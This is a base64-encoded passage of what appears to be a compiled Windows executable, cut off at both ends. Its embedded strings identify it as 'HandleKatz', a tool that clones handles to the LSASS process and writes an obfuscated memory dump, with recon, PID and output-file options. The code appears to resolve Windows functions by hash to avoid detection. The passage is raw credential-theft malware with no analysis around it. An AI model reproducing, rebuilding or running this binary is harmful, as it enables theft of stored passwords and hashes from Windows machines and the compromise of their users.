FBQUVqSFJDUXdBQUFBQUVqSFJDUTRBQUFBQUVqSGhDUkFBUUFBQUFBQUFFakhoQ1JJQVFBQUFBQUFBTWNIQUFBQUFFaU52Q1JRQVFBQTgwaXJ4d2NBQUFBQWhOSjBHbVlQSDBRQUFBKzJ5RWlEd0FHSVZBd3dRUSsyRkFTRTBuWHNUSTFrSkRCSWpWUWtMa3lKNFVILzBFbUp3RWlGd0ErRTJnQUFBQSsyVUFIR0FBQ0UwZytFQ1FFQUFESEFEeCtBQUFBQUFBKzJ5RWlEd0FHSWxBeEFBUUFBUVErMlZBQUJoTkoxNkErMmhDUkFBUUFBaE1BUGhOZ0FBQUJNallRa1FRRUFBTGtGRlFBQUR4OEFpY3BKZzhBQndlSUZBZEFCd1VFUHRrRC9oTUIxNm9IeFJFTkNRVUdKelErMlJDUXdoTUFQaEtjQUFBQk1qVVFrTWJrRkZRQUFacENKeWttRHdBSEI0Z1VCMEFIQlFRKzJRUCtFd0hYcWdmRkVRMEpCNkk4QUFBQklpY0ZJaGNCMEYwU0o2dWl2Q0FBQVNJSEVVQUlBQUY5QlhFRmR3MmFRdVRHdEFqSG9aZ0FBQUVpSndVaUZ3SFVXTWNCSWdjUlFBZ0FBWDBGY1FWM0REeCtBQUFBQUFMcS9zLzBlNkc0SUFBQkloY0IwMjB5SjRmL1FTSW5CU0lYQWRhVXh3T3ZNRHgrRUFBQUFBQUJCdlVGV1FrSHBUUC8vLzdsQlZrSkI2WGYvLy8rUWtKQ1FrSkNRa0pDUWtHVklpd1FsWUFBQUFFaUxRQmlCOFVSRFFrRkJpY3BNaTFnZ1RZblpEeDhBU1l0SlVFaUZ5WFJqRDdjQlpvWEFkRjlJaWNvUEgwQUFSSTFBdjJaQmcvZ1pkd2FEd0NCbWlRSVB0MElDU0lQQ0FtYUZ3SFhpRDdjQlpvWEFkREpCdUFVVkFBQVBIMEFBUkluQ1NJUEJBc0hpQlFIUVFRSEFEN2NCWm9YQWRlbEZPY0owRjAyTENVMDV5M1dVTWNERGtFRzRCUlVBQUVVNXduWHBTWXRCSU1OQlZFR0oxRk9KeTBpRDdGam9ULy8vLzBpRndIVWl1VEd0QWpIb1FQLy8vMGlKd1VpRndIVW9TSVBFV0RIQVcwRmN3MllQSDBRQUFFaUR4RmhFaWVKSWljRmJRVnpwUmdjQUFHWVBIMFFBQUxxL3MvMGU2RFlIQUFCSWhjQjB5WUg3bCt4Ym1BK0VoUUFBQUlIN0RjbGlKZytFNlFBQUFJSDdZOWRQNWcrRXRRQUFBSUg3aUNiNEFBK0VBUUVBQUlIN3V3N085WFdSU0xwQmNHa3RiWE10ZDhaRUpFSUFTTGxwYmkxamIzSmxMVWlKVkNRZ1NMcDJaWEp6YVc5dUxVaUpUQ1FvU0xsc01TMHhMVEF1WkVpSlZDUXd1bXhzQUFCSWlVd2tPRWlOVENRZ1pvbFVKRUQvMEVpSndlc3NacEJCdUd4c0FBQklqVXdrSU1aRUpDb0FTTHRWYzJWeU16SXVaRWlKWENRZ1prU0pSQ1FvLzlCSWljRkloY2tQaEFYLy8vOUlnOFJZUkluaVcwRmM2VjRHQUFCbUR4OUVBQUJJdTFOb2JIZGhjR2t1U0kxTUpDREhSQ1FvWkd4c0FFaUpYQ1FnLzlCSWljSHJ2dzhmUkFBQVNMdEJaSFpoY0drek1raU5UQ1FneGtRa0xBQklpVndrSU1kRUpDZ3VaR3hzLzlCSWljSHJrZzhmaEFBQUFBQUFTTHRRYzJGd2FTNWtiTGxzQUFBQVpvbE1KQ2hJalV3a0lFaUpYQ1FnLzlCSWljSHBZdi8vLzVDUWtKQ1FrSkNRUVZSRk1jQkZNZVJXVTBpSnkwaUQ3RERIUkNRc0FBQUFBRWlOZENRc1NZbnhUSW5pdVJBQUFBRG9qTjMvLzRYQWVRbzlCQUFBd0hRWFJUSGtTSVBFTUV5SjRGdGVRVnpERHgrRUFBQUFBQUJOaGVSMERrRzRBSUFBQURIU1RJbmgvMU00UWJnQUVBQUFpMVFrTEVHNUJBQUFBREhKLzFOSVJJdEVKQ3hKaWNUcm5KQ1FrSkNRa0pDUWtKQ1FrSkNRUVZkQlZrV0p4a0ZWVFluTlFWUlZNZTFYU0lub1Zvbk91U2NBQUFCVFNJblRTSUhzeUFVQUFFaU52Q1NBQUFBQVRJMjhKSUFBQUFEelNLdE1pZm5vN1FZQUFFR0p4SVhBZFI1SWdjVElCUUFBUkluZ1cxNWZYVUZjUVYxQlhrRmZ3dzhmZ0FBQUFBQk1pZm5vQUEwQUFFR0p4SVhBRDRRZEFnQUFoZllQaE1VQUFBQkl1RnNxWFNCRGFHVmpUSW5wU0xwcmFXNW5JR1p2Y3NhRUpBQUVBQUFBU0ltRUpNQURBQUJCdkFFQUFBQkl1Q0J3Y205alpYTnpTSW1VSk1nREFBQkl1bVZ6SUhkcGRHZ2dTSW1FSk5BREFBQkl1R0VnYzNWcGRHRmlTSW1VSk5nREFBQkl1bXhsSUdoaGJtUnNTSW1FSk9BREFBQkl1R1VnZEc4Z2JITmhTSW1VSk9nREFBQkl1bk56SUM0dUxpQUtTSW1VSlBnREFBQklqWlFrd0FNQUFFaUpoQ1R3QXdBQS81UWtpQUFBQUV5SitreUo2ZWhDQlFBQTZRZi8vLzhQSDBRQUFFaU52Q1RRQVFBQXVUNEFBQUJGaWZER1JDUnlBRWk0V3lwZElFRjBkR1ZJdW0xd2RHbHVaeUIwU01lRUpNQURBQUFBQUFBQVRJMmtKTUFEQUFCSWlVUWtRRWlOdENUQUFRQUFTTGh2SUdOc2IyNWxJRWlKUkNSUVNMaHVaR3hsSUdaeWIwaUpSQ1JndUdRS0FBQm1pVVFrY0VpNFd5cGRJRTkxZEdaSWlVUWtJRWlKNlBOSXEwaUpWQ1JJdVQ0QUFBQkl1bXh6WVhOeklHaGhTSTI4Sk5BREFBQklpVlFrV0VpNmJTQndhV1E2SUNWSXg0UWt5QU1BQUFBQUFBRHpTS3RJaWZGSWlWUWthRWk2YVd4bE9pQWxjd3BJaVZRa0tFaU5WQ1JBeGtRa01BQkl4NFFrd0FFQUFBQUFBQUJJeDRRa3lBRUFBQUFBQUFEL2xDU1lBQUFBU1luWVRJbmhTSTFVSkNEL2xDU1lBQUFBU0lueVRJbnAvNVFraUFBQUFFeUo0a3lKNlVHOEFRQUFBUCtVSklnQUFBQk5pZmxKaWRoTWllcEVpZkhvMVBELy8rbTUvZi8vRHgrQUFBQUFBRWk2WkNCdWIzUWdaVzVNaWVsSXVGc3RYU0JEYjNWc3g0UWs0QU1BQUd4bFoyVklpWlFreUFNQUFFaTZkV2NnY0hKcGRtbElpWVFrd0FNQUFFaTRZV0pzWlNCRVpXSklpWlFrMkFNQUFMb0tBQUFBWm9tVUpPUURBQUJJalpRa3dBTUFBRWlKaENUUUF3QUEvNVFraUFBQUFPazcvZi8va0VGVlJUSEpSVEhTU0xndUFHRUFZd0J0QUVGVVZWZElpYzh4eVZaSWlkWXgwbE5NaWNORk1jQklnZXlvQUFBQVNJbEVKQ1F4d0V5TlpDUWtTSTFzSkdCbWlVUWtMRWk0TGdCa0FHd0FiQUJJaVVRa0xraTRMZ0JrQUhJQWRnQklpVVFrT0VpNExnQmxBSGdBWlFCSWlVUWtRa2k0TGdCdkFHTUFlQUJJaVVRa1RFaTRMZ0IyQUhnQVpBQklpVVFrVmtpTlJDUXVTSWxFSkdoSWpVUWtPRWlKUkNSd1NJMUVKRUpJaVVRa2VFaU5SQ1JNU0ltRUpJQUFBQUJJalVRa1ZtYUpWQ1EyWm9sTUpFQm1SSWxFSkVwbVJJbE1KRlJtUklsVUpGNU1pV1FrWUVpSmhDU0lBQUFBU01lRUpKQUFBQUFBQUFBQVRJbmgvNVBJQUFBQVFZbkZTSmhJT2ZCelBVaUo4a2dwd2tpTkRGZE1pZUwva3lnQkFBQ0Z3SFVaU0lIRXFBQUFBRVNKNkZ0ZVgxMUJYRUZkdzJZUEgwUUFBRXlMWlFoSWc4VUlUWVhrZGJCRk1lM3IxWkNRa0pDUWtFRldRVlZCVkVtSjFGVkVpY1ZYUkluUFZraUp6bE5JZyt3Z1NJdFpXRWlMaENTQUFBQUFTSVhiZEcyTFVXQkVpMGxrUkRuS2NqWkhqU3dKVEl1d21BQUFBRVNKYVdUL2tJZ0FBQUJGaWVsSmlkZ3gwa2lKd1VuQjRRUkIvOVpJaWNOSWlVWllTSVhiZEZ1TFZtQkJpZENEd2dGSndlQUVUQUhEVElramlXc0lpWHNNaVZaZ1NJUEVJRnRlWDExQlhFRmRRVjdERHg4QVNJdVlnQUFBQU1kQlpDQUFBQUQva0lnQUFBQkJ1QUFDQUFBeDBraUp3Zi9UU0luRFNJbEdXRWlGMjNXbFNNZEdZQUFBQUFCSWc4UWdXMTVmWFVGY1FWMUJYc09Ra0pDUVZWZFdVMGhqYVR4SUFjMkx2WWdBQUFCSUFjOUVpMDhnaTNjWVNRSEpoZlowVm9uVFNZbkxSVEhTZ2ZORVEwSkJRWXNCdVFVVkFBQk1BZGhNalVBQkQ3WUFoTUIwSVdZdUR4K0VBQUFBQUFDSnlzSGlCUUhRQWNGTWljQkpnOEFCRDdZQWhNQjE2VG5aZEJSSmc4SUJTWVBCQkV3NTFuVzRNY0JiWGw5ZHc0dFhKRXVOREZPTFJ4d1B0eFFSU1kwVWs0c0VBa3dCMkVnNXgzZmVpNVdNQUFBQVNBSFhTRG40ZDlCYlNJbkJYbDlkNlJyMS8vK1FrSkNRa0pDUWtKQ1FRVlJCdVVBQUFBQkppY3hYVmt5SnhsTklpZE5JZyt4NFNNZEVKQ0FBQUFBQVRJMUVKRERvWmRqLy8waGpWQ1JzU1lud1RJbmhTTWRFSkNBQUFBQUFRYmtJQVFBQWljZElBZHJvUWRqLy8yYUJmQ1F3VFZwMUJBbkhkQlF4d0VpRHhIaGJYbDlCWE1NUEg0UUFBQUFBQURIQWdUNVFSUUFBRDVUQTYrR1FrSkJCVlVtSnpVaUowVUZVVTBpSjAwaUQ3RkRvMmZqLy8waUZ3SFEwU1luRVNZblpUWW5vTWRKSWljSG80ZWYvLzB5SjRVRzRBSUFBQURIUy8xTTRTSVBFVUxnQkFBQUFXMEZjUVYzRER4OUFBRWk0V3kxZElFWmhhV3pIUkNSQWJHVnpDa3lKNlVpNlpXUWdkRzhnWjJWSWlVUWtJRWk0ZENCaElHeHBjM1JJaVZRa0tFaTZJRzltSUdoaGJtUklpVlFrT0VpTlZDUWdTSWxFSkRER1JDUkVBUDlUQ0VpRHhGQXh3RnRCWEVGZHcxTzZ6OC9ZRkVpSnk3a3hyUUl4U0lQc0lPaHA5di8vdWlmby9aTzVNYTBDTVVpSkEraFg5di8vdWs3b2hwTzVNYTBDTVVpSlF3am9SUGIvLzdxSCs5cTV1WmZzVzVoSWlVTVE2REgyLy8rNnZvYlVxcmt4clFJeFNJbERHT2dlOXYvL3VrT0pNbm01TWEwQ01VaUpReURvQy9iLy83cTFoTVFJdVRHdEFqRklpVU1vNlBqMS8vKzZhb3pOSjdreHJRSXhTSWxETU9qbDlmLy91dE5NYm5tNU1hMENNVWlKUXpqbzB2WC8vN3B4ZmU5T3VXUFhUK1pJaVVOSTZMLzEvLys2ZkdIMFRybGoxMC9tU0lsRFVPaXM5Zi8vdWc0S0pLVzVNYTBDTVVpSlExam9tZlgvLzdvdHh4RmZ1VEd0QWpGSWlVTmc2SWIxLy8rNk1SL1pucmxqMTAvbVNJbERhT2h6OWYvL3V2U3ZmaWU1TWEwQ01VaUpRM0RvWVBYLy83cEtKTDlldVRHdEFqRklpVU40NkUzMS8vKzZSazRhaDdreHJRSXhTSW1EZ0FBQUFPZzM5Zi8vdW9IUUNuYTVNYTBDTVVpSmc0Z0FBQURvSWZYLy83cGhnbk5mdVRHdEFqRklpWU9RQUFBQTZBdjEvLys2dGlpdEVya3hyUUl4U0ltRG1BQUFBT2oxOVAvL3VyK3ovUjY1TWEwQ01VaUpnNkFBQUFEbzMvVC8vN3F5ckVyQ3VUR3RBakZJaVlPb0FBQUE2TW4wLy8rNmVJMnNjYmt4clFJeFNJbURzQUFBQU9pejlQLy91a29jQ0lPNU1hMENNVWlKZzdnQUFBRG9uZlQvLzdwazZJYVR1VEd0QWpGSWlZUEFBQUFBNklmMC8vKzZXL2h6anJreHJRSXhTSW1EeUFBQUFPaHg5UC8vdXR1bzBaYTVNYTBDTVVpSmc5QUFBQURvVy9ULy83cUxlamhNdVRHdEFqRklpWVBZQUFBQTZFWDAvLys2elFWQlVMbTdEczcxU0ltRDRBQUFBT2d2OVAvL3VpcTZOcFM1dXc3TzlVaUpnK2dBQUFEb0dmVC8vN29ZMnljNXVic096dlZJaVlQd0FBQUE2QVAwLy8rNnFhajlrN2t4clFJeFNJbUQrQUFBQU9qdDgvLy91aVFLSktXNU1hMENNVWlKZ3dBQkFBRG8xL1AvLzdyVzNKemt1VEd0QWpGSWlZTUlBUUFBNk1Iei8vKzZ0VVQxdDdreHJRSXhTSW1ERUFFQUFPaXI4Ly8vdXRxY3pidTVNYTBDTVVpSmd4Z0JBQURvbGZQLy83cXZudjJUdVRHdEFqRklpWU1nQVFBQTZIL3ovLys2UlozOWs3a3hyUUl4U0lsRFFPaHM4Ly8vdXNBdDdQcTVEY2xpSmtpSmd5Z0JBQURvVnZQLy8waUR1eEFCQUFBQVNJbURNQUVBQUErRUVRSUFBRWlEdXhnQkFBQUFENFFyQWdBQVNJTzdJQUVBQUFBUGhFVUNBQUJJZzN0Z0FBK0VZZ0lBQUVpRGUyZ0FENFIvQWdBQVNJTzdDQUVBQUFBUGhKa0NBQUJJZzNzSUFBK0V2Z0VBQUVpRGV4QUFENFN6QVFBQVNJTjdHQUFQaEtnQkFBQklnM3NnQUErRW5RRUFBRWlEZXlnQUQ0U1NBUUFBU0lON01BQVBoSWNCQUFCSWczczRBQStFZkFFQUFFaURlMGdBRDRSeEFRQUFTSU43VUFBUGhHWUJBQUJJZzN0WUFBK0VXd0VBQUVpRGUyQUFENFJRQVFBQVNJTjdhQUFQaEVVQkFBQklnM3R3QUErRU9nRUFBRWlEZTNnQUQ0UXZBUUFBU0lPN2dBQUFBQUFQaENFQkFBQklnN3VJQUFBQUFBK0VFd0VBQUVpRHU1QUFBQUFBRDRRRkFRQUFTSU83bUFBQUFBQVBoUGNBQUFCSWc3dWdBQUFBQUErRTZRQUFBRWlEdTZnQUFBQUFENFRiQUFBQVNJTzdzQUFBQUFBUGhNMEFBQUJJZzd1NEFBQUFBQStFdndBQUFFaUR1OEFBQUFBQUQ0U3hBQUFBU0lPN3lBQUFBQUFQaEtNQUFBQklnN3ZRQUFBQUFBK0VsUUFBQUVpRHU5Z0FBQUFBRDRTSEFBQUFTSU83NEFBQUFBQjBmVWlEdStnQUFBQUFkSE5JZzd2d0FBQUFBSFJwU0lPNytBQUFBQUIwWDBpRHV3QUJBQUFBZEZWSWc3c0lBUUFBQUhSTFNJTzdFQUVBQUFCMFFVaUR1eGdCQUFBQWREZElnN3NnQVFBQUFIUXRTSU43UUFCMEpraUR1eWdCQUFBQWRCeElnN3N3QVFBQUFIUVNNY0JJZ3pzQUQ1WEE2d2tQSDRBQUFBQUFNY0JJZzhRZ1c4TzYxdHljNUxtSUp2Z0E2Q0h4Ly85SWc3c1lBUUFBQUVpSmd4QUJBQUFQaGRuOS8vOFBIMEFBdXJWRTliZTVpQ2I0QU9qNThQLy9TSU83SUFFQUFBQklpWU1ZQVFBQUQ0Vy8vZi8vRHg5QUFMcmFuTTI3dVlnbStBRG8wZkQvLzBpRGUyQUFTSW1ESUFFQUFBK0ZwZjMvL3c4ZmdBQUFBQUM2RGdva3BibUlKdmdBNktudy8vOUlnM3RvQUVpSlEyQVBoWXY5Ly85bUxnOGZoQUFBQUFBQXVpM0hFVis1aUNiNEFPaUI4UC8vU0lPN0NBRUFBQUJJaVVOb0Q0VnUvZi8vRHgrQUFBQUFBTG9rQ2lTbHVZZ20rQURvV2ZELy8waUpnd2dCQUFEcFRQMy8vNUNRa0pDUWtKQ1FrSkNRa0pCQlZMb29BQUFBUlRIa1ZsTklpY3RJeDhILy8vLy9TSVBzY0VqSFJDUTRBQUFBQUV5TlJDUTRTTWRFSkVBQUFBQUFTTWRFSkVnQUFBQUE2RW5MLy8rRndIVldNY25IUkNSQUFRQUFBRWk2Y21sMmFXeGxaMlZJdUZObFJHVmlkV2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Vsb2NhdGlvbiBwcm90b2NvbCB2ZXJzaW9uICVkLgoAAAAAAAAAICBVbmtub3duIHBzZXVkbyByZWxvY2F0aW9uIGJpdCBzaXplICVkLgoAAAAAAAAAAAAAAAAAAACwPf//sD3//7A9//+wPf//sD3//xg9//+wPf//4D3//xg9//9DPf//AAAAAAAAAAAobnVsbCkATmFOAEluZgAAKABuAHUAbABsACkAAAAAALJo//+4Yv//uGL//8xo//+4Yv//1Gf//7hi///rZ///uGL//7hi//9gaP//nGj//7hi//9nZv//gGb//7hi//+cZv//uGL//7hi//+4Yv//uGL//7hi//+4Yv//uGL//7hi//+4Yv//uGL//7hi//+4Yv//uGL//7hi//+4Yv//uGL//7xm//+4Yv//9Gb//7hi//8sZ///ZGf//5xn//+4Yv//ImX//7hi//+4Yv//UGb//7hi//+4Yv//uGL//7hi//+4Yv//uGL//+lo//+4Yv//uGL//7hi//+4Yv//MGP//7hi//+4Yv//uGL//7hi//+4Yv//uGL//7hi//+4Yv//qmT//7hi//8nZP//oGP//0pl///gZf//GGb//4Jl//+gY///iGP//7hi//+iZf//wmX//2xk//8wY///4mT//7hi//+4Yv//+2P//4hj//8wY///uGL//7hi//8wY///uGL//4hj//8AAAAASW5maW5pdHkATmFOADAAAAAAAAAAAPg/YUNvY6eH0j+zyGCLKIrGP/t5n1ATRNM/BPp9nRYtlDwyWkdVE0TTPwAAAAAAAPA/AAAAAAAAJEAAAAAAAAAIQAAAAAAAABxAAAAAAAAAFEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAADgPwAAAAAAAAAABQAAABkAAAB9AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADwPwAAAAAAACRAAAAAAAAAWUAAAAAAAECPQAAAAAAAiMNAAAAAAABq+EAAAAAAgIQuQQAAAADQEmNBAAAAAITXl0EAAAAAZc3NQQAAACBfoAJCAAAA6HZIN0IAAACilBptQgAAQOWcMKJCAACQHsS81kIAADQm9WsMQwCA4Dd5w0FDAKDYhVc0dkMAyE5nbcGrQwA9kWDkWOFDQIy1eB2vFURQ7+LW5BpLRJLVTQbP8I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